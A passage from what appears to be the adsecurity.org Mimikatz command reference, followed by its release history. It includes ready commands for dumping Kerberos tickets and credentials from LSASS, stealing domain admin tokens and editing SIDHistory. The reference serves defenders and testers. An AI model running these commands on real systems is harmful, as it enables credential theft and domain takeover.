id="SEKURLSATickets"></a><b>SEKURLSA::Tickets</b> &#8211; Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer&#8217;s AD computer account.<br /> Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).</p> <ul> <li>/export &#8211; optional &#8211; tickets are exported in .kirbi files. They start with user&#8217;s LUID and group number (0 = TGS, 1 = client ticket(?) and 2 = TGT)</li> </ul> <p>Similar to credential dumping from LSASS, using the sekurlsa module, an attacker can get all Kerberos ticket data in memory on a system, including those belonging to an admin or service.<br /> This is extremely useful if an attacker has compromised a web server configured for Kerberos delegation that users access with a backend SQL server. This enables an attacker to capture and reuse all user tickets in memory on that server.</p> <p>The “kerberos::tickets” mimikatz command dumps the current logged-on user’s Kerberos tickets and does not require elevated rights. Leveraging the sekurlsa module’s capability to read from protected memory (LSASS), all Kerberos tickets on the system can be dumped.</p> <p>Command:  <em>mimikatz sekurlsa::tickets exit</em></p> <ul> <li>Dumps all authenticated Kerberos tickets on a system.</li> <li>Requires administrator access (with debug) or Local SYSTEM rights</li> </ul> <p>The following screenshot shows dumped password and Kerberos tickets (TGS &amp; TGT) of another user who is a Domain Admin (LukeSkywalker).</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-SekurlsaTickets" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets_thumb.png" alt="Mimikatz-SekurlsaTickets" width="874" height="824" border="0" /></span></a><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part2-AdminTGT.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-SekurlsaTickets-Part2-AdminTGT" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part2-AdminTGT_thumb.png" alt="Mimikatz-SekurlsaTickets-Part2-AdminTGT" width="874" height="257" border="0" /></span></a></p> <p><span style="font-family: times new roman;"><span style="font-size: medium; font-family: times new roman;">The following screenshot </span><span style="font-size: medium;">shows dumped credentials and Kerberos tickets (TGS &amp; TGT) of another admin (HanSolo).</span></span></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part3-AdminTGT.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-SekurlsaTickets-Part3-AdminTGT" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part3-AdminTGT_thumb.png" alt="Mimikatz-SekurlsaTickets-Part3-AdminTGT" width="877" height="833" border="0" /></span></a></p> <p><span style="font-family: times new roman;"><span style="font-size: medium; font-family: times new roman;">The following screenshot </span><span style="font-size: medium;">shows dumped credentials and Kerberos tickets (TGS &amp; TGT) for a SQL service account (svc-SQLDBEngine01).</span></span></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part4-ServiceTGT.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-SekurlsaTickets-Part4-ServiceTGT" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-SekurlsaTickets-Part4-ServiceTGT_thumb.png" alt="Mimikatz-SekurlsaTickets-Part4-ServiceTGT" width="879" height="726" border="0" /></span></a></p> <p>&nbsp;</p> <p><b>SEKURLSA::Trust</b> &#8211; get trust keys<br /> <em>(I think this is deprecated in favor of lsadump::trust /patch)</em></p> <p><b>SEKURLSA::TSPKG</b> &#8211; Lists TsPkg credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-TSPKG.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1843" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-TSPKG.png" alt="Mimikatz-Sekurlsa-TSPKG" width="471" height="670" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-TSPKG.png 471w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-TSPKG-211x300.png 211w" sizes="(max-width: 471px) 100vw, 471px" /></a></p> <p><b>SEKURLSA::Wdigest</b> &#8211; List WDigest credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest.jpg" rel="attachment wp-att-2154"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-2154" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest.jpg" alt="Mimikatz-sekurlsa-wdigest" width="1676" height="1527" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest.jpg 1676w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest-300x273.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest-768x700.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-wdigest-1024x933.jpg 1024w" sizes="(max-width: 1676px) 100vw, 1676px" /></a></p> <h4></h4> <h4><b><a id="SERVICE"></a>SERVICE</b></h4> <p><b>SERVICE::+</b>  (plus sign)- Install Mimikatz service (&#8216;mimikatzsvc&#8217;)</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3818" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Plus.png" alt="" width="475" height="114" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Plus.png 753w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Plus-300x72.png 300w" sizes="(max-width: 475px) 100vw, 475px" /></p> <p><b>SERVICE::-  </b>(minus sign) &#8211; Uninstall Mimikatz service (&#8216;mimikatzsvc&#8217;)</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3817" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Minus.png" alt="" width="374" height="83" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Minus.png 523w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Service-Minus-300x67.png 300w" sizes="(max-width: 374px) 100vw, 374px" /></p> <p><b>SERVICE::List </b>&#8211; List Services</p> <p><b>SERVICE::Me</b></p> <p><b>SERVICE::Preshutdown</b> &#8211; preshutdown service</p> <p><b>SERVICE::Remove</b> &#8211; Remove service</p> <p><b>SERVICE::Resume</b> &#8211; resume service</p> <p><b>SERVICE::Shutdown</b> &#8211; shutdown service</p> <p><b>SERVICE::Start</b> &#8211; Start a service</p> <p><b>SERVICE::Stop</b> &#8211; Stop service</p> <p><b>SERVICE::Suspend</b> &#8211; Suspend the service</p> <p>&nbsp;</p> <h4><b><a id="SID"></a>SID</b></h4> <p>The Mimikatz SID module replaces MISC::AddSID. Use SID::Patch to patch the ntds service.</p> <p><b>SID::add </b>&#8211; Add a SID to SIDHistory of an object</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png"><img loading="lazy" decoding="async" class="alignnone wp-image-2866" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png" alt="Mimikatz-SID-add" width="601" height="153" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png 1876w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add-300x76.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add-768x196.png 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add-1024x261.png 1024w" sizes="(max-width: 601px) 100vw, 601px" /></a></p> <p><b>SID::clear </b>&#8211; Clear SIDHistory of an object</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query.png"><img loading="lazy" decoding="async" class="alignnone wp-image-2867" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query.png" alt="Mimikatz-SID-clear-query" width="599" height="372" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query.png 1627w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query-300x186.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query-768x477.png 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-clear-query-1024x636.png 1024w" sizes="(max-width: 599px) 100vw, 599px" /></a></p> <p><strong>SID::lookup</strong> &#8211; Name (/name) or SID (/sid) lookup</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup.png"><img loading="lazy" decoding="async" class="alignnone wp-image-2863" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup.png" alt="Mimikatz-SID-Lookup" width="492" height="86" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup.png 1498w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup-300x53.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup-768x135.png 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Lookup-1024x180.png 1024w" sizes="(max-width: 492px) 100vw, 492px" /></a></p> <p><b>SID::modify </b>&#8211; Modify object SID of an object</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png"><img loading="lazy" decoding="async" class="alignnone wp-image-2865" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png" alt="Mimikatz-SID-Modify" width="777" height="149" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png 2527w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify-300x57.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify-768x147.png 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify-1024x196.png 1024w" sizes="(max-width: 777px) 100vw, 777px" /></a></p> <p><b>SID::patch </b>&#8211; Patch NTDS service</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Patch.png"><img loading="lazy" decoding="async" class="alignnone wp-image-2868" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Patch.png" alt="Mimikatz-SID-Patch" width="374" height="68" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Patch.png 970w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Patch-300x55.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Patch-768x140.png 768w" sizes="(max-width: 374px) 100vw, 374px" /></a></p> <p><b></b><b>SID::query </b>&#8211; Query object by SID or name</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query.png"><img loading="lazy" decoding="async" class="alignnone wp-image-2864" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query.png" alt="Mimikatz-SID-query" width="491" height="114" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query.png 1635w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query-300x70.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query-768x178.png 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-query-1024x238.png 1024w" sizes="(max-width: 491px) 100vw, 491px" /></a></p> <p>&nbsp;</p> <h4><b><a id="STANDARD"></a>STANDARD</b></h4> <p><b>STANDARD::Answer</b>&#8211; Answer to the Ultimate Question of Life, the Universe, and Everything.</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3816" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Answer.png" alt="" width="285" height="49" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Answer.png 436w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Answer-300x52.png 300w" sizes="(max-width: 285px) 100vw, 285px" /></p> <p><b>STANDARD::Base64 </b>&#8211; switch output to base64 output</p> <p><b>STANDARD::CD </b>&#8211; change or display current directory</p> <p><b>STANDARD::CLS </b>&#8211; Clear screen</p> <p><b>STANDARD::Coffee </b>&#8211; show an ASCII image of coffee 🙂</p> <p><b>STANDARD::Exit</b>&#8211; quit Mimikatz</p> <p><b>STANDARD::Hostname </b>&#8211; Displays system local host</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3822" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Hostname.png" alt="" width="315" height="57" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Hostname.png 465w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Hostname-300x54.png 300w" sizes="(max-width: 315px) 100vw, 315px" /></p> <p><b>STANDARD::LocalTime </b>&#8211; Displays system local date and time (OJ command)</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3821" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-LocalTime.png" alt="" width="313" height="78" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-LocalTime.png 473w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-LocalTime-300x75.png 300w" sizes="(max-width: 313px) 100vw, 313px" /></p> <p><b>STANDARD::Log </b>&#8211; Send Mimikatz data to log file</p> <p><b>STANDARD::MarkRus</b>&#8211; Pass-the-Hash information. 😉<br /> <em>Removed in Mimikatz 2.1.1</em></p> <p><b>STANDARD::Sleep </b>&#8211; sleep an amount of milliseconds</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3820" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Sleep.png" alt="" width="306" height="50" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Sleep.png 465w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Sleep-300x49.png 300w" sizes="(max-width: 306px) 100vw, 306px" /></p> <p><strong>STANDARD::Version </strong>&#8211; display version information</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3813" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Version.png" alt="" width="352" height="99" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Version.png 586w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Standard-Version-300x84.png 300w" sizes="(max-width: 352px) 100vw, 352px" /></p> <p>&nbsp;</p> <h4><b><a id="SYSENV"></a>SYSENV</b></h4> <p>The Mimikatz SYSENV module provides the ability to manage system environment variables.</p> <p><b>SYSENV::List<br /> SYSENV::Get<br /> SYSENV::Set<br /> SYSENV::Del </b></p> <p>&nbsp;</p> <h4><b><a id="TOKEN"></a>TOKEN</b></h4> <p>The Mimikatz Token module enables Mimikatz to interact with Windows authentication tokens, including grabbing and impersonating existing tokens.</p> <p><a id="TOKENElevate"></a><b>TOKEN::Elevate</b> &#8211; impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box using the Windows API.<br /> <em>Requires Administrator rights.</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1.png" rel="attachment wp-att-2805"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-2805" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1.png" alt="Mimikatz-Token-Elevate1" width="836" height="117" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1.png 836w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1-300x42.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate1-1-768x107.png 768w" sizes="(max-width: 836px) 100vw, 836px" /></a></p> <p>Find a domain admin credential on the box and use that token: <em>token::elevate /domainadmin</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin.jpg" rel="attachment wp-att-2175"><img loading="lazy" decoding="async" class="alignnone wp-image-2175" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin.jpg" alt="Mimikatz-Token-Elevate-DomainAdmin" width="811" height="114" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin.jpg 1901w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin-300x42.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin-768x108.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Elevate-DomainAdmin-1024x144.jpg 1024w" sizes="(max-width: 811px) 100vw, 811px" /></a></p> <p><a id="TOKENList"></a><b>TOKEN::List</b> &#8211; list all tokens of the system</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-List.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1845" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-List.png" alt="Mimikatz-Token-List" width="842" height="589" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-List.png 842w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-List-300x210.png 300w" sizes="(max-width: 842px) 100vw, 842px" /></a></p> <p><b>TOKEN::Revert</b> &#8211; revert to process token</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Whoami.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1847" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Whoami.png" alt="Mimikatz-Token-Whoami" width="839" height="167" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Whoami.png 839w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Token-Whoami-300x60.png 300w" sizes="(max-width: 839px) 100vw, 839px" /></a></p> <p><b>TOKEN::Run </b>&#8211; Run</p> <p><b>TOKEN::Whoami</b> &#8211; Display current identity</p> <p>&nbsp;</p> <h4><b><a id="TS"></a>TS</b></h4> <p><b>TS::MultiRDP</b> &#8211; (experimental) Patch Terminal Server service to allow multiple users</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-TS-MultiRDP.png"><img loading="lazy" decoding="async" class="alignnone wp-image-1848" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-TS-MultiRDP.png" alt="Mimikatz-TS-MultiRDP" width="266" height="40" /></a></p> <p><b>TS::Sessions </b>&#8211; List TS/RDP sessions.</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3812" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-TS-Sessions.png" alt="" width="300" height="564" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-TS-Sessions.png 586w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-TS-Sessions-160x300.png 160w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-TS-Sessions-545x1024.png 545w" sizes="(max-width: 300px) 100vw, 300px" /></p> <p><b>TS::Remote </b></p> <p>&nbsp;</p> <h4><b><a id="VAULT"></a>VAULT</b></h4> <p><b>VAULT::List</b> &#8211; list vault credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Vault-List.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1849" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Vault-List.png" alt="Mimikatz-Vault-List" width="726" height="140" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Vault-List.png 726w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Vault-List-300x58.png 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Vault-List-720x140.png 720w" sizes="(max-width: 726px) 100vw, 726px" /></a></p> <p><b>VAULT::Cred</b> &#8211; cred</p> <p>&nbsp;</p> <h3><strong><a id="MimikatzVersionHistory"></a>Mimikatz Version History</strong></h3> <p><em>Sourced from <a href="https://github.com/gentilkiwi/mimikatz/releases">Mimikatz release Github page</a> </em></p> <p><strong>Mimikatz 2.1.1 &#8211; Release Date: 12/20/2017<br /> </strong>2.1.1 20171220<strong><br /> </strong>Clear event logs without the event log logging 1102 &#8220;Event Log Cleared&#8221;</p> <p>Mimikatz 2.1.1 &#8211; Release Date: 12/19/2017<br /> 2.1.1 20171219</p> <p><strong>Mimikatz 2.1.1 &#8211; Release Date: 12/18/2017</strong><br /> 2.1.1 20171218<br /> mimidrv updated for Windows 10 version 1709, (x64)</p> <p><strong>Mimikatz 2.1.1 &#8211; Release Date: 11/28/2017<br /> </strong>2.1.1 20171128</p> <p><strong>Mimikatz 2.1.1 &#8211; Release Date: 11/06/2017<br /> </strong>2.1.1 20171106<br /> [fix #107] remove _vscwprintf dependency with mimilove on Windows 2000<br /> [credits] with his work on AD, Vincent Le Toux (@vletoux) is starring as co-author 🙂<br /> [internal] DRSR RPC<br /> [fix] dcsync export as CSV without junk chars between username and NTLM hash</p> <p><strong>Mimikatz 2.1.1 &#8211; Release Date: 08/13/2017<br /> </strong>2.1.1 20170813<br /> crypto::extract now supports CAPI &amp; BCrypt (RSA/AES/DES/3DES/DESX/RC4/RC2&#8230;)<br /> [new] lsadump::changentlm to *change* user password/hash to another password/hash</p> <p>&#8230;</p> <p><strong>Mimikatz Release Date: 6/06/2016<br /> </strong>2.1 alpha 20160506.1 (oe.eo) edition<br /> [remove] mimikatz lsadump::dcsync req v10 &amp; rep v9<br /> [future fix] mimikatz lsadump::dcsync pDrsExtensionsInt-&gt;dwExtCaps = MAXDWORD32</p> <p><strong>Mimikatz Release Date: 6/06/2016<br /> </strong>2.1 alpha 20160606 (oe.eo) edition<br /> [fix #47] mimikatz lsadump::dcsync &#8216;Fun with flags&#8217; to support AD Privileged Access Management in 2016 TP5 (req v10 &amp; rep v9)</p> <p><strong>Mimikatz Release Date: 6/04/2016<br /> </strong>2.1 alpha 20160604 (oe.eo) edition<br /> [fix #46] MSV structure alignment for Windows 10 &gt; LTSB (LSAISo &amp; normal)<br /> [enhancement] SID/Name lookup &amp; LDAP query now with system arg (not only local/current domain)</p> <p><strong>Mimikatz Release Date: 6/01/2016<br /> </strong>2.1 alpha 20160601 (oe.eo) edition<br /> [fix] mimikatz lsadump::dcsync now supports AD with recycle bin enabled (thanks to Marcus Rath for report)</p> <p><strong>Mimikatz Release Date: 5/25/2016<br /> </strong>2.1 alpha 20160525 (oe.eo) edition<br /> lsadump::netsync to ask a DC to send current and previous NTLM hash of DC/SRV/WKS<br /> Lots of thanks to @asolino for his help!</p> <p><strong>Mimikatz Release Date: 5/22/2016</strong><br /> 2.1 alpha 20160522 (oe.eo) edition<br /> [fix #39] Removing 2 bytes of alignment when using LSAIso with MSV</p> <p><strong>Mimikatz Release Date: 5/06/2016</strong><br /> 2.1 alpha 20160506 (oe.eo) edition<br /> [fix #36] Replace wcsicmp by _wcsicmp to avoid warnings with moderns VS<br /> New SID module<br /> [remove] misc::addsid<br /> [new] sid:: module, to lookup, query, modify, add&#8230; (2003/2008r2/2012r2 right now)</p> <p><strong>Mimikatz Release Date: 4/30/2016<br /> </strong>2.1 alpha 20160501 (oe.eo) edition<br /> [close #35] DCSync works with renamed domains<br /> Thanks to @rmbolger &amp; @MichaelGrafnetter, DCSync now deals with msDS-ReplicationEpoch / dwReplEpoch</p> <p><strong>Mimikatz Release Date: 3/27/2016<br /> </strong><em>2.1 alpha 20160327 (oe.eo) edition</em><br /> <em>Welcome to Windows 10 LTSB &amp; current</em><br /> <em>[remove] mimidrv &amp; mimikatz kernel module: Process &amp; Object callbacks remover are not anymore in the program</em><br /> <em>[internal] Windows 10 is now splitted in 1507 (LTSB) and 1511 (current)</em><br /> <em>[internal] mimidrv: Windows 10 support added</em><br /> <em>[internal] mimilib WinDBG module &amp; mimikatz::sekurlsa: Windows 10 MSV / Kerberos Tickets are not specific anymore (offsets table)</em><br /> <em>[internal] Using KULL_M_MEMORY_GLOBAL_OWN_HANDLE instead of local variable in each function</em></p> <p><strong>Mimikatz Release Date: 2/29/2016<br /> </strong><em>2.1 alpha 20160229 (oe.eo) edition</em><br /> System Environment Variables &amp; other stuff<br /> [new] System Environment Variables user module<br /> [new] System Environment Variables kernel IOCTL for Set<br /> [enhancement] privilege::sysenv<br /> [enhancement] Busylight<br /> [enhancement] misc::skeleton can avoid anti-AES patching for aware clients with /letaes</p> <p><strong>Mimikatz Release Date: 2/17/2016</strong><br /> <em>2.1 alpha 20160217 (oe.eo) edition</em><br /> [new] crypto::certificates /silent &amp; /nokey flags<br /> [new] crypto::keys /silent flag<br /> [new] kull_m_busylight module now support protocol for new devices</p> <p><strong>Mimikatz Release Date: 2/07/2016</strong><br /> Some DPAPI stuff<br /> [new] vault module now handles more Vault types, Attributes and Properties (with /attributes)<br /> [new] misc::compressme to create a compressed version of mimikatz<br /> [new] dpapi::cred now handles legacy (NT5) multiple credentials<br /> [new] dpapi::wifi &amp; dpapi::wwan to deal with network profiles<br /> [internal] kuhl_m_vault: vault::list now deals with SID / credentials attributes (with one incorrect align.)<br /> [internal] kull_m_string: removed unused kull_m_string_suspectUnicodeStringStructure<br /> [internal] kull_m_string: added kull_m_string_printSuspectUnicodeString<br /> [internal] kull_m_string: added dirty kull_m_string_quickxml_simplefind<br /> [internal] kull_m_memory: quick compress &amp; decompress routines<br /> [internal] kull_m_dpapi: added blob flags descriptions<br /> [internal] kull_m_dpapi: fixed blob protection flags description for system<br /> [internal] kull_m_dpapi: removed unused kull_m_dpapi_unprotect_backupkey_with_secret<br /> [internal] kull_m_cred: added legacy (NT5) credentials structures &amp; routines</p> <p><strong>Mimikatz Release Date: 1/31/2016</strong><br /> Lots of internals and 2003 SP1 support<br /> [new] sekurlsa module and its kerberos submodule now work with old 2003 SP1 (live or dump)<br /> [remove] misc::wifi with WLanAPI will be replaced with dpapi::wifi raw access<br /> [fix] crypto::certificate buffer free at the right place<br /> [internal] new kull_m_file Find function with callback<br /> [internal] removed kull_m_file functions (read/write/file exist) with environment-variables, now used for all command-lines<br /> [internal] kull_m_crypto_hash better checks for CRC32 trick<br /> [internal] mimilove for Windows 2000 banner update<br /> [internal] crypto::system now works with buffers (for future registry access)<br /> [internal] kerberos::ptt &amp; crypto::system call kull_m_file_Find instead of their own implementation<br /> [internal] remove CrtlHandler, from mimikatz main modules, when exiting to let PowerShell clean<br /> [internal] expand command lines environment-variables from mimikatz main modules</p> <p><strong>Mimikatz Release Date: 1/16/2016</strong><br /> Crypto, crypto everywhere&#8230;<br /> [new] crypto::providers and crypto::certificates now list provider types<br /> [internal] Removed kull_m_crypto_crc32 routine from crypto module, relies now on cryptdll using CALG_CRC32 with kull_m_crypto_hash<br /> [internal] Removed incorrect usage of BOOL instead of NTSTATUS in kuhl_m_pac_validationInfo_to_PAC</p> <p><strong>Mimikatz Release Date: 1/11/2016</strong><br /> Crypto &amp; Kerberos enhancements<br /> [fix] dpapi::capi now deals with AT_SIGNATURE keys<br /> [fix] sekurlsa::kerberos / kerberos:: encryption type are now signed<br /> [new] kerberos::ask to ask / save TGS from current TGT<br /> [new] crypto::system to describe/to export Windows System Certificate (cert, crl, ctl, keyid)<br /> [internal] smaller banner for smaller displays<br /> [internal] Copyrights for 2016<br /> [internal] kull_m_file can deal with environment-variable strings in paths<br /> [internal] kull_m_crypto new types for CERT_PROP_*_ID.</p> <p><strong>Mimikatz Release Date: 1/05/2016</strong><br /> MSV &amp; Kerberos fixes, LSA and Privilege enhancements<br /> [fix] sekurlsa::msv &amp; mimilib for Windows 10 build 10586<br /> [fix #20] sekurlsa::tickets (display &amp; export) for NT 6 != Windows 10<br /> [close #16] kerberos::golden now with ~NetBios name in LogonDomainName field of the PAC<br /> [new] privilege module shortcuts (driver, security, tcb, backup, restore) and functions (by id or name)<br /> [new] lsadump::dcsync and lsadump::lsa /inject &#8216;NTLM-Strong-NTOWF&#8217; in Supplemental Credentials structures (Windows 2016 TP 4)<br /> [internal] NtSetSystemInformation can now be used in code</p> <p><strong>Mimikatz Release Date: 11/12/2015</strong><br /> mimikatz &amp; mimilib sekurlsa module ready for Windows 10 build 10586</p> <p><strong>Mimikatz Release Date: 11/09/2015</strong><br /> mimikatz: updated to build with hid.lib</p> <p><strong>Mimikatz Release Date: 10/08/2015</strong><br /> Kiwi &amp; René Coty BusyLight mode</p> <p><strong>Mimikatz Release Date: 10/04/2015</strong><br /> mimikatz + mimilib sekurlsa fix for SmartCard informations</p> <p><strong>Mimikatz Release Date: 9/29/2015</strong><br /> sekurlsa::kerberos &#8211; Fix SmartCard pin code</p> <p><strong>Mimikatz Release Date: 9/26/2015</strong><br /> sekurlsa::pth Auto-impersonation (/impersonate)</p> <p><strong>Mimikatz Release Date: 9/16/2015</strong><br /> lsadump::dcsync fix for with 2012r2 AD Recycle Bin<br /> Thank you to @asolino, @mubix &amp; @carnal0wnage !</p> <p><strong>Mimikatz Release Date: 9/06/2015</strong><br /> Enhancements<br /> * Code cleaning</p> <p><strong>Mimikatz Release Date: 9/01/2015</strong><br /> kerberos::golden : fix for groups printing.<br /> lsadump::dcsync autoselect a 